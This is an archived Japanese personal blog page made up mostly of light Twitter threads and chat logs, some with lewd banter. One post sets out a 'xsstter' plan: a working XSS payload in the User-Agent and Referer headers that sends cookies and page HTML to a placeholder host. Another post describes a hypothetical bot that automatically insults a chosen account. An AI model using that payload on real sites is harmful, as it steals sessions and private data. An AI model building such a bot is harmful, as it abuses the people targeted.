ついったーとHamachiya2

ライブドアリーダーで購読
Subscribe with livedoor Reader

2009/10/09 (金)

ジャガイモは野菜か否か

ジャガイモは野菜か否か - ついったーとHamachiya2 を含むブックマーク はてなブックマーク - ジャガイモは野菜か否か - ついったーとHamachiya2

Hamachiya2
Hamachiya2
そんなことより、ぼくの何年も前からの疑問に誰か答えて
Hamachiya2
Hamachiya2
ジャガイモは野菜か否か。 ぼくはずっと野菜だと思っていたんだけど、『あれは穀物なので、あれを野菜とするならば米も野菜だ』と主張されて、うまく反論できなかった
hamachiyasabu
hamachiyasabu
@Hamachiya2 なんと!!あれですか、兄貴さすがです
hamachiyalovXe
hamachiyalove
はまちおにいちゃんのえっち… RT @Hamachiya2 ジャガイモは野菜か否か。 ぼくはずっと野菜だと思っていたんだけど、『あれは穀物なので、あれを野菜とするならば米も野菜だ』と主張されて、うまく反論できなかった
tagomoris
tagomoris
穀物かどうかは「炭水化物の摂取を主目的とするかどうか」じゃないかと自分は思っているので、そういう意味でジャガイモは穀物。 RT: @Hamachiya2: ジャガイモは野菜か否か。
farmine
farmine
@Hamachiya2 「ポテトチップスはジャガイモが原料だからヘルシーさ!HAHAHA!」という感じのアメリカンジョークなのか本気なのかわからない話を思い出した
coshina
coshina
@Hamachiya2 そう考えるとカレーは穀物に穀物を入れたものという解釈になりますね。野菜に野菜を入れた野菜カレーの方がまだ自然です。
_La
_La
穀物って野菜じゃないんだ?しらんかった・・・RT:@Hamachiya2 ジャガイモは野菜か否か。 ぼくはずっと野菜だと思っていたんだけど、『あれは穀物なので、あれを野菜とするならば米も野菜だ』と主張されて、うまく反論できなかった
gadd9
gadd9
これは簡単。イモは穀物じゃないもん。 RT @Hamachiya2: ジャガイモは野菜か否か。 ぼくはずっと野菜だと思っていたんだけど、『あれは穀物なので、あれを野菜とするならば米も野菜だ』と主張されて、うまく反論できなかった
IZUMI162i6
IZUMI162i6
穀物は種を食べるものだけど、ジャガイモは茎だから違うんじゃない? RT @Hamachiya2: ジャガイモは野菜か否か。 ぼくはずっと野菜だと思っていたんだけど、『あれは穀物なので、あれを野菜とするならば米も野菜だ』と主張されて、うまく反論できなかった
nagai2000
nagai2000
イモは根っこなんだから野菜かな。ダイコンとかニンジンとか RT @Hamachiya2: ジャガイモは野菜か否か。 ぼくはずっと野菜だと思っていたんだけど、『あれは穀物なので、あれを野菜とするならば米も野菜だ』と主張されて、うまく反論できなかった
hisame
hisame
え、米も小麦も野菜の一種じゃないの RT @Hamachiya2: ジャガイモは野菜か否か。 ぼくはずっと野菜だと思っていたんだけど、『あれは穀物なので、あれを野菜とするならば米も野菜だ』と主張されて、うまく反論できなかった
hisame
camellia
へぇ~。穀物(こくもつ)は、植物から得られる食材の総称の1つで、澱粉質を主体とする種子を食用とするもの。(ウィキペディアより) RT http://twitter.com/Hamachiy... (via @Hamachiya2)
realthief
realthief
@Hamachiya2 野菜ジュースにいれても美味しそうなのが野菜!
popn
popn
@Hamachiya2 じゃがいもは穀類ではありません。でも野菜でもないようです。http://bit.ly/3nnGQ
go_kenny
go_kenny
@Hamachiya2 えええーっ!穀物ってたべられる種のことだとおもってました!!!根菜も種なのかなぁ。
chocopa
chocopa
@Hamachiya2 ジャガイモは日本では野菜に分類されていたと思うのですが、それを示す資料が見あたらないのです。
grinder
grinder
@Hamachiya2 その人的には、野菜と穀物の境目はどこなんでしょー?そこが問題では
HARDI
HARDI
@Hamachiya2 穀物はイネ科とマメ科に大分されてて、じゃがいもはナス科です。穀物は種で、イモ類は根や地下茎。その方は『主食になり得るもの=穀物』っていう考え方なのかな。というわけで、じゃがいもは野菜だと思うです。じゃないとカレーにごはんがいらなくなっちゃうから。
FTTH
FTTH
@Hamachiya2 専門家の検証はさて置き素人(つーか俺)の印象論としては米も野菜で良いんじゃないかと思いますが。 一般的にそういわないだけで。 (当然ジャガイモも野菜でよい
Posokosi
Posokosi
@Hamachiya2 主食となる穀物、いも、豆は野菜に含めないことが多いが、それを主食としない文化圏では野菜として扱われることがある。気になったので調べたらこういうことらしいですよ。欧米だと米も野菜に含まれることがあるとか。
DocSeri
DocSeri
@Hamachiya2 穀物⊂野菜 と定義すれば
tomto
tomto
気になって調べてしまった http://bit.ly/48QgAM RT @Hamachiya2: ジャガイモは野菜か否か。 ぼくはずっと野菜だと思っていたんだけど、『あれは穀物なので、あれを野菜とするならば米も野菜だ』と主張されて、うまく反論できなかった
mikage014
mikage014
@Hamachiya2 じゃがいもが青果コーナーから移動したら野菜じゃないと信じます
torus
torus
根菜は穀物に入らないんじゃないかなぁ。ジャガイモはデンプンだから穀物に似ているけど。 RT @Hamachiya2: ジャガイモは野菜か否か。 ぼくはずっと野菜だと思っていたんだけど、『あれは穀物なので、あれを野菜とするならば米も野菜だ』と主張されて、うまく反論できなかった
honke_sivuch
honke_sivuch
@Hamachiya2 カレーの「具」と主張できるものが野菜、だから米は野菜じゃない。
shimakid
shimakid
@Hamachiya2 穀物は種子を指すのであって、根菜のじゃがいもは穀物ではないはずなので、なぜ「あれは穀物なので」とつっこまれたのかが謎です。 シマシマP( http://縮.jp/穂 )
knobs
knobs
ドイツ人みたいな主食にしている人達は、穀物感覚があると思います。 RT @Hamachiya2: ジャガイモは野菜か否か。 ぼくはずっと野菜だと思っていたんだけど、『あれは穀物なので、あれを野菜とするならば米も野菜だ』と主張されて、うまく反論できなかった
manamanmana
manamanmana
欧州では穀物だよなー。日本だと野菜になる様な。要は食文化の違い。RT @Hamachiya2: ジャガイモは野菜か否か。 ぼくはずっと野菜だと思っていたんだけど、『あれは穀物なので、あれを野菜とするならば米も野菜だ』と主張されて、うまく反論できなかった
IidAkihikO
IidAkihikO
別にどっちでもいいけど野菜だと信じたい。 RT @Hamachiya2 じゃがいも問題まとめといた。 みなさんありがとう http://twitter.g.hatena.ne....

2009/10/01 (木)

さっちゃんに学ぶ片付けの心得

さっちゃんに学ぶ片付けの心得 - ついったーとHamachiya2 を含むブックマーク はてなブックマーク - さっちゃんに学ぶ片付けの心得 - ついったーとHamachiya2

Mさんの発言: 部屋が汚くても文句言わない人としか一緒に生活できない気がしてる
Mさんの発言: もしくは部屋の片付けしてくれる人
Sさんの発言: 片付けしてくれる人いいですね
Tさんの発言: 汚いってどのくらい汚いの?
Mさんの発言: 床が台所と風呂とPCのあるところをつなぐところしか見えない程度に汚い
Mさんの発言: 台所は比較的片付けするようにはしてる
Sさんの発言: 引っ越したばっかりなのにそんなに散らかってるのか
Mさんの発言: 服をどうしたらいいのかわからない
さっちゃんの発言: たため!
Mさんの発言: 相変わらず段ボールから出して段ボールにしまってる
さっちゃんの発言: もしくはハンガーラックみたいなの買え!
さっちゃんの発言: それしかない
さっちゃんの発言: もっさり部屋にだしといても、たたんでさえいればきれいに見える
Mさんの発言: ハンガーラック的なものを買ったけど組み立ててない
さっちゃんの発言: 組み立てろ!
Mさんの発言: はい…
さっちゃんの発言: Mさんさんタイプは、収納買っても使わないだろうから
さっちゃんの発言: ハンガーラック&たたむで片付けたほうがいいよ
Mさんの発言: まさにその通りだと思う
Xさんの発言: うちの母はとにかく畳んで風呂敷に包むという技を使っていたな
さっちゃんの発言: 下着だけなんかボックス的なやつにいれればいい
Mさんの発言: 下着は全部小さめの段ボール箱に突っ込んでる
さっちゃんの発言: ダンボールはだめだ!!!
Mさんの発言: はい…
さっちゃんの発言: キレイにしててもダンボールってだけで部屋がダメに見える!
Mさんの発言: ダメ部屋にすんでます…
さっちゃんの発言: 3段棚みたいなの+カゴみたいなの作ったらいい
さっちゃんの発言: 空いた二段にいろいろおける
さっちゃんの発言: ベッドあるならベット下の引き出し的なヤツ
Mさんの発言: 三段の棚あるけどタオルが大量に突っ込んである
Tさんの発言: 俺はハンガーで干してそのままクロゼットに
Mさんの発言: あとベッドの半分が漫画に浸食されつつある
はまちや2の発言: あ、ぼくも漫画タワーで足の踏み場ない
さっちゃんの発言: 漫画は、
さっちゃんの発言: 読んだら売れ!!!!!!!!!!
Xさんの発言: ヒー
さっちゃんの発言: また読みたくなったらまた買え!!!!!!!!!
Mさんの発言: はい…
はまちや2の発言: はい…
さっちゃんの発言: 本当にお気に入りのやつだけ手元に!
さっちゃんの発言: ブッコフを本棚として使うんだ!!!!
さっちゃんの発言: 漫画喫茶もあるし手元に置いておくのは無駄!!!
さっちゃんの発言: 片付けしだすと、読んじゃって片付かないし
さっちゃんの発言: 家に置いててもいいことない
さっちゃんの発言: 人が遊びに来ても、結局漫画読んでオワリ、とかになるのもつまらんし
Tさんの発言: レコードがたくさんあるんだけど
さっちゃんの発言: レコードは
さっちゃんの発言: 音源をパソコンにいれろ!!!!!
Tさんの発言: 2500枚あるので
さっちゃんの発言: 2500枚あっても残したいのは10分の1くらいなはず!!!
さっちゃんの発言: わたしは本もマンガも読んだら捨てるし、
さっちゃんの発言: CDも取り込んだら捨てる
Xさんの発言: ストイックや・・・
はまちや2の発言: さっちゃんすげー
さっちゃんの発言: また読みたくなったら、また買うor漫画喫茶行く
Xさんの発言: 先生!猫と糸柳が増えてから某所がものすごく汚いんだけどどう掃除していいのかわかりません!
さっちゃんの発言: 猫と糸柳を部屋から出すな!!!!!
Xさんの発言: にゃー
さっちゃんの発言: ていうか、
さっちゃんの発言: 布団とかも冬使ったら捨てる
はまちや2の発言:
Xさんの発言: なんと
Mさんの発言: mjd
さっちゃんの発言: そのかわり、すんごい安いやつを買うんだよ
さっちゃんの発言: ニトリとかのやつ
はまちや2の発言: 安いの買って、毎シーズン捨て…
はまちや2の発言: それいつも思うんだけど結局安いの使ったままになる
さっちゃんの発言: だって
さっちゃんの発言: ずっと収納してた布団とか
さっちゃんの発言: きたなそうだし収納スペースがもったいない
Xさんの発言: すごいなー
Xさんの発言: 確かに荷物は減らしたいねん
Mさんの発言: 確かに押し入れ突っ込んでおくとかび臭くなりがちだもんな
さっちゃんの発言: だってふとん2980円とかで買えるじゃんいま
さっちゃんの発言: 5000円もしないものを後生大事に押入れにとか
さっちゃんの発言: 良く考えたら狂ってない?
さっちゃんの発言: そのかわり、毛布とかはけっこういいやつを大事に使う
さっちゃんの発言: 毛布と布団じゃかさばる量が全然違うし
さっちゃんの発言: 布団が安物でも毛布がしっかりしてるとあったかい
はまちや2の発言: 場所=広さってお金かかってるからなー
さっちゃんの発言: そうなんだよ
さっちゃんの発言: 場所=お金なんですよ
さっちゃんの発言: 布団置き場分の家賃払うくらいなら捨てて有効活用するわー
さっちゃんの発言: 昔は物捨てられないタイプだったんだけど
さっちゃんの発言: しばらく使ってないってことは
さっちゃんの発言: そんなに自分にとって大事じゃないし必要なもんじゃないんだ!
さっちゃんの発言: って思うようになった
さっちゃんの発言: なんか最近はガシガシ捨てるようにしてる
Mさんの発言: それなりの広さの部屋にすんでいるのに
Mさんの発言: ものが多すぎて普段すごい狭い範囲で生活してるので
Mさんの発言: 捨てる精神を養いたいと思いました
Mさんの発言: 1日1個ずつ何か捨てていこう
Xさんの発言: 1個買ったら2個捨てる
はまちや2の発言: あとさー友達の家とかいったりしたときに
はまちや2の発言: 「どうかんがえてもそれゴミやん」っていうのがあると
はまちや2の発言: ちゃんとゴミ箱にゴミ捨てられない人って結構いるのかなーって思う
はまちや2の発言: なんかティッシュとか、食いかすとか。
はまちや2の発言: ぼくも片付けは苦手なんだけど、あからさまなゴミだけはすぐに捨てたいタイプだから
はまちや2の発言: そういうのが放置されてるとすごい気になる
Xさんの発言: あるねー
Xさんの発言: うちも毎日のようにゴミはゴミ箱に捨てれといってるけど
Xさんの発言: なかなか治らないね
Mさんの発言: ティッシュとかその辺に放置しがちかな…人がいるときは捨てるけど。
Mさんの発言: ゴミ箱が遠いとその辺に置いておいてしまう
Mさんの発言: 22になってもゴミ捨てられない仕方づけられない
はまちや2の発言: ぼくは、じぶんの居場所から手が届く位置にゴミ箱がないとイライラする
はまちや2の発言: ゴミはとにかく発生した瞬間に捨てるのがキモだと思う。「あとで」はダメ絶対
Mさんの発言: ゴミをゴミって認識できることが大切な気がする
さっちゃんの発言: ゴミちゃんと捨てるようにするだけで、けっこう片付くよ
さっちゃんの発言: 飲んだあとの缶とかペットボトルとかが
さっちゃんの発言: テーブルに置きっぱなしとかもいやだなー
さっちゃんの発言: ゴミ捨て、かたづけの範疇を段々広げていく
さっちゃんの発言: ゴミをゴミ箱に捨てれるようになったら
さっちゃんの発言: 次は
さっちゃんの発言: 本は本棚
さっちゃんの発言: 服はたたむ、かける、
さっちゃんの発言: って出来るようになる気がするな
はまちや2の発言: もったいないから、
はまちや2の発言: さっちゃんの名言まとめてちょっとエントリーにしてくる

スペシャルサンクス さっちゃん (sachi_volta) on Twitter


2009/09/28 (月)

携帯をもつ理由

携帯をもつ理由 - ついったーとHamachiya2 を含むブックマーク はてなブックマーク - 携帯をもつ理由 - ついったーとHamachiya2

Hamachiya2
Hamachiya2
携帯電話ってなんでみんな「買う」じゃなくて「持つ」って言うんだろう? 「まだ携帯もたないの?」みたいな。 DSとかPSPとかiPodは「買う」なのになー
hamachiyalove
hamachiyalove
はまちおにいちゃんすごい! RT @Hamachiya2 携帯電話ってなんでみんな「買う」じゃなくて「持つ」って言うんだろう? 「まだ携帯もたないの?」みたいな。 DSとかPSPとかiPodは「買う」なのになー
tomozo
tomozo
@Hamachiya2 携帯しないと存在意義が薄れる機器ではないかな…DSやPSPとかiPodよりも、と言う意味で
tetsu3
tetsu3
携帯は月額で払っていくものでもあるしなぁ。 RT @Hamachiya2 携帯電話ってなんでみんな「買う」じゃなくて「持つ」って言うんだろう? 「まだ携帯もたないの?」みたいな。 DSとかPSPとかiPodは「買う」なのになー
MSL_Sanative
MSL_Sanative
@Hamachiya2 もう娯楽的なものじゃなくて、電気や水道と同じく必需品扱いになってきたからじゃないんですかねえ
tot_main
tot_main
@Hamachiya2 電話加入権(古っ!)は持つものだから? ♪
yuta0210
yuta0210
@Hamachiya2 インフラとして認識されてるからじゃないですかねえ
u_s_k
u_s_k
@Hamachiya2 多分生活必需品という認識だからかと。
nori0620
nori0620
@Hamachiya2 携帯って買った後でも、「持ってる」限り、毎月通信料が必要ですよね。だから他の機器と違って「買う」より「持つ」ことにお金がかかるモノだからっていう理由はどうでしょ?
Yuichirou
Yuichirou
@Hamachiya2 さん タダだったから。今は機器代が別になって、「買う」という言い方も耳にするようになりましたね。
miu
miu
@Hamachiya2 関係ないけどこっちの方言じゃ、給料やボーナスは「あたる」ものだよ。
jinandsieste
jinandsieste
昔はレンタルからスタートした様な記憶があります。だから「買う」ではなく「持つ」なのかと RT @Hamachiya2: 携帯電話ってなんでみんな「買う」じゃなくて「持つ」って言うんだろう? 「まだ携帯もたないの?」みたいな。 DSとかPSPとかiPodは「買う」なのになー
naco6r
naco6r
@Hamachiya2 つねに身につけてるのが前提だから、ですかね?
goroq
goroq
結構大事なポイントなのかも RT @Hamachiya2: 携帯電話ってなんでみんな「買う」じゃなくて「持つ」って言うんだろう?
machan
machan
一時期0円だったりしたのと、月々のランニングコストがあることをみんな知ってるからかなぁ RT @Hamachiya2: 携帯電話ってなんでみんな「買う」じゃなくて「持つ」って言うんだろう? 「まだ携帯もたないの?」みたいな。 DSとかPSPとかiPodは「買う」なのになー
kleinteich
kleinteich
@Hamachiya2 たぶん、DSやなんかと違って、ケータイは買い切りじゃないからかな。
ma0036
ma0036
@Hamachiya2 携帯端末じゃなくて電話回線という意味が強いからでしょうかね?

2009/07/31 (金)

followしただけで友達気分

followしただけで友達気分 - ついったーとHamachiya2 を含むブックマーク はてなブックマーク - followしただけで友達気分 - ついったーとHamachiya2

ついったー用語解説その1

followしただけで友達気分」とは
→ 有名人などをtwitterでfollowしただけでお友達気分になり、リアルな知人や同僚などについ自慢げな態度をとってしまうこと

(例)

A 「そういえば前に、かとゆーってニュースサイトで紹介されたんだけどさーアクセスがすごくって」
B 「あ、katoyuu? 俺知ってるよ? なんなら言っておこうか?

A 「昨日ダンコガイさんて人のブログでさぁ」
B 「あ、dankogai? 俺知ってるよ? なんなら言っておこうか?

A 「『断る力』書いた人、最近よく」
B 「あ、和代ちゃん? 俺知ってるよ? なんなら言っておこうか?


またよく似た言葉に「名刺交換しただけで友達気分」という言葉も。

名刺交換しただけで友達気分」とは
→ 有名な企業の人と名刺交換したことあるだけでお友達気分になって以下略

(例)

A 「最近ドラクエはまっててさぁ」
B 「あ、スクエニ? 俺知ってるよ? なんなら言っておこうか?

A 「昨日の月9ドラ」
B 「あ、CX? 俺知ってるよ? なんなら言っておこうか? それか電通? そっちもルートあるよ?



2009/06/24 (水)

さちぼるてゅいったー

さちぼるてゅいったー - ついったーとHamachiya2 を含むブックマーク はてなブックマーク - さちぼるてゅいったー - ついったーとHamachiya2


@sachi_volta っていう独特なしゃべり方をするひとがいるんだけど、
なんかもう今日とか暑くてあれだし、
みんなさっちゃんになってしまえばいいやと思ってつくってみたよ!



ついったーのホームだとかで、
ブラウザのアドレス欄にコピペすれば、みんなでさちぼゅたなんだぉ!

2009/01/22 (木)

黒いボット

黒いボット - ついったーとHamachiya2 を含むブックマーク はてなブックマーク - 黒いボット - ついったーとHamachiya2

hamachiyalove というbotがある。

これは、ぼく(Hamachiya2)が何かを発言するたびに、
無条件に肯定してくれるというtwitter用のbot
(botという程のものではないんだけれど)
一応、肯定っぽい発言をする他に、ぼくの全発言をfavしたり、ブックマークしたり、はてなスターまで与えてくれる。

で、これの逆バージョン。

あなたは誰を呪いたいですか?

入力フォームに対象のアカウントIDを入力すると、対象がtwitterなどで発言するたびに、

「@対象 お前キモいよ。
「@対象 喋んなよ。つまんねーから

などと自動的に中傷する。

はてなブックマークでも同様に、対象のブックマークを後追いブクマして

「id:対象 は全然わかってないな。あたまわりー
「id:対象 『対象のコメント』こんなこと言うやつは死ねばいい

などとIDコールしつつ否定コメントする。

ダイアリーでも同様。 自動的にブクマ1ゲットして中傷。

もちろん単に無視する、あるいはサービス側に無視機能が実装される、
なんて道もあると思う。

だけどたぶん、こういうものが作られちゃうと、
心の弱い何人かの人は死んでしまうんじゃないだろうかなーとも思う。

そしてこれは有料化することによって、さらに威力が増す。
頭がおかしくなるほど呪いたい対象がいる人は、お金を払ってでも使い、
そして、やられた側には
金を払ってまで俺を呪いたい奴がいるのか…
などと思わせることができ、ダメージ倍増。

ちなみにぼくは hamachiyalove を作った際に、
すぐにここに書いたようなbot
つまり、ぼくが発言するたびに「キモい」だの何だの言うbotが現れることを予想して
hamachiyadis というアカウントだけは押さえておいたんだけれど、
いまだにそういったbotは出現していない。

2008/12/03 (水)

xsstter仕様書

xsstter仕様書 - ついったーとHamachiya2 を含むブックマーク はてなブックマーク - xsstter仕様書 - ついったーとHamachiya2

(概要)
User-AgentやReferrerを表示する箇所にXSSがあるサイトを発見し、自動的に情報をtwitterに投稿する。
主に適当に作られていることの多いアクセス解析の管理画面などで発動すると思われる。

(しくみ)
特殊なUser-AgentやReffererを設定したクローラーが適当にWebを巡る。
UAやRefの内容は以下のような感じ。

'"><form id="x__f" method="post" action="http://xsstter.example.com/"><input name="x__r" id="x__r"><input name="x__c" id="x__c"><input name="x__s" id="x__s"></form><script>window.onload=function(){d=document; d.getElementById('x__r').value=d.referrer; d.getElementById('x__c').value=d.cookie; d.getElementById('x__s').value=d.documentElement.innerHTML; d.getElementById('x__f').submit();}</script><x x="'

もしアクセス解析のような画面で、上のUser-Agentがエスケープされずに表示された場合、つまりXSSが発動した場合 xsstter.example.comというホストに、

  • 発動したページの前のページURL(JavaScriptのリファラ)
  • 発動したページのクッキーの内容
  • 発動したページのHTMLソース

がJavaScriptよって送信され、また、

  • 発動したページのURL(リクエスト時のリファラ)
  • 発動させた人のhost名

がリクエストヘッダにのって送信される。

xsstterの図
xsstterの図

これを受け取った xsstter.example.com のサーバーは、受け取った情報を記録し、
情報に重複がなければ、情報を整形し見やすくしたページを表示できるようにし、
また、その情報ページのパーマリンクを生成する。

xsstter:XSS詳細情報ページ

そして、twitterのxsstterアカウントを使って、以下のような投稿を自動的に行う。

xsstter: (xssが発動したドメイン)(xssを発動させたhost) によってXSSが発動しました! 詳細 → http://xsstter.example.com/permalink

というのを考えたんだけど、エガミくん運用まかせた。

2008/11/07 (金)

みんなでウェブサービス考えたよ!

みんなでウェブサービス考えたよ! - ついったーとHamachiya2 を含むブックマーク はてなブックマーク - みんなでウェブサービス考えたよ! - ついったーとHamachiya2


[20:47] nommy/asuinim/L4RK: 蟹うまかった
[20:48] nommy/asuinim/L4RK: でも、蟹って食うの疲れるなあ
[20:48] はまちや2: エガミくん、カニが楽に食えるウェブサービスつくろうよ
[20:48] nommy/asuinim/L4RK: 実装任せた!
[20:48] はまちや2: ものすごい需要があると思う。
[20:48] nommy/asuinim/L4RK: 確かに
[20:49] はまちや2: しかもカニ業界がスポンサーにつく。
[20:49] nommy/asuinim/L4RK: 蟹を楽に食えるウェッブサービスはこの季節必要
[20:49] send: 蟹喰いたいけど面倒だ
[20:49] nommy/asuinim/L4RK: ほんわか酔ってきもちいい
[20:49] riko: 楽に食べられるようになったら蟹はブレイクする
[20:49] つっくんλjavascripter: カニ用の先が二つしかない細いフォーク、あれ使ってもあんまり食いやすくならない
[20:49] nommy/asuinim/L4RK: 確かに
[20:49] nommy/asuinim/L4RK: 箸でつつくのと変わりない
[20:49] pha: 蟹むいちゃいました
[20:49] はまちや2: いえてる。手がべたべたなる。
[20:50] nommy/asuinim/L4RK: ボクも食事中、5回くらい洗面所行った
[20:50] send: デートで蟹を喰う場合、お互い黙ってても支障ないぐらいの仲でないと難しい気がする
[20:51] はまちや2: じゃあ可愛い女性が、横に座って、ひたすらカニを食べやすく剥いてくれるウェブサービスとかどうだろう
[20:51] send: 素敵!
[20:51] nommy/asuinim/L4RK: かわいい女性が犬歯でバキっとやってくれて
[20:51] はまちや2: 
[20:51] つっくんλjavascripter: 
[20:51] riko: 美少年がカニを剥いてほしい
[20:51] nommy/asuinim/L4RK: かわいい女性の使用した箸でほじくりだしてくれるというサービス
[20:51] OK: 相変わらず酷い事ばっか考えてますね
[20:51] OK: すばらしいですけど
[20:51] riko: んで、べたべたになった指をなめる
[20:51] はまちや2: ぺろぺろ。
[20:51] OK: ぬおすばらしい!
[20:52] send: かわいい女の子が口移しで蟹を食べさせてくれるサービス
[20:52] OK: もはやその手のお店じゃないですかw
[20:52] はまちや2: sendさんは変態だな。
[20:52] riko: 剥いた蟹の足の端から食べていくねん
[20:52] send: ポッキー的や
[20:54] nommy/asuinim/L4RK: 鍋から上げた蟹はクソ熱いので
[20:54] nommy/asuinim/L4RK: ふーふーしてくれるお姉さんがいるだけでもいい
[20:54] つっくんλjavascripter: かわいい蟹が女の子を口移しで食べさせてくれるサービス
[20:54] riko: もはやただのエロいカニ料理の店で、ウェブサービス関係ない
[20:54] OK: みんなの脳内ひどいなー

エガミくん、実装まかせた。

2008/10/30 (木)

傘購入

傘購入 - ついったーとHamachiya2 を含むブックマーク はてなブックマーク - 傘購入 - ついったーとHamachiya2

長らく愛用していたビニール傘が、とうとう壊れちゃったんだよ…!

そんなわけで、これをきっかけに、
『ぼくも社会人として恥ずかしくないような3000えんくらいする高級傘を買うべきだ!』
と思いたって、twitter でみんなに、オススメの傘を聞いてみたよ。

(参考) hmcy - 傘まとめ

てまきちゃんの教えてくれた、シンプルな骨が16本のやつと、
ざざのばくんが教えてくれた、かわいい葉っぱのやつで
すごい悩んだんだけど、
結局、てまきちゃんの教えてくれたやつにした!

これ!

totes 16K Stick brella

今日、無事にとどいたよ!
思ってたよりもずっと良かった。

てまき傘
持ち手部分のラバーな感じがいいね!

アンブレラの似合う男になるのが夢
アンブレラの似合う男になります!

てまきちゃんありがとう大事にしますね!

2008/10/10 (金)

egachat(2008/10/07) part2

egachat(2008/10/07) part2 - ついったーとHamachiya2 を含むブックマーク はてなブックマーク - egachat(2008/10/07) part2 - ついったーとHamachiya2

( ← egachat part1 からのつづき)

(今後はどうしたら)
[6:29] えがちゃん: 最後に2つ質問したいのですが
[6:30] えがちゃん: ・スカイプのイメージはどうでした?
[6:30] えがちゃん: ・今後はどうしたらいいとおもいますか?
[6:30] えがちゃん: をぜひ、お願いしたいです><
[6:30] tmura: ここでまだ、どうしたらいいって聞くから炎上するんだよ
[6:30] はまちや2: すごい
[6:30] はまちや2: ウェブサービスのアンケートみたい!
[6:30] tmura: さんざんどうしたらいいって言われてたのにw
[6:30] えがちゃん: wwwwww
[6:30] はまちや2: その調子でがんばって
[6:31] えがちゃん: わかりました!!
[6:31] はまちや2: 今後については・・・
[6:31] えがちゃん: はい
[6:31] はまちや2: たとえば、次は無意味にamachangに牙をむいてみるとかどうかな
[6:31] はまちや2: そういう展開。
[6:31] yuyarin: 
[6:31] えがちゃん: なるほど
[6:32] あれっくす: それは見たい
[6:32] えがちゃん: 「逆転の発想」はありですね。

続きを読む